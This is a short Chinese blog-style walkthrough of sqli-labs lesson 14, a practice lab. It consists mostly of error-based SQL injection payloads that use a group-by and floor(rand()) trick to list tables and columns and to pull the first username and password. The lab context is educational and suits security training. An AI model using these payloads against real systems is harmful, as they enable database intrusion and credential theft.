时间:2021-07-01 10:21:17 帮助过:33人阅读
有数据库后 开始爆破表名
" union select count(*),concat_ws(‘;‘,(select table_name from information_schema.tables where table_schema=‘security‘),floor(rand()*2)) as a from information_schema.tables group by a#
limit绕吧 这是不是个数问题 不能用group绕
" union select count(*),concat_ws(‘;‘,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#
得到表名后
爆列名
" union select count(*),concat_ws(‘;‘,(select column_name from information_schema.columns where table_name=‘users‘ limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#
last 爆破字段 --第一个用户名和密码
" union select count(*),concat_ws(‘,‘,(select username from users limit 0,1),(select password from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#
sqli-lab(14)
标签:rom sele 数据 username 实验 img use floor alt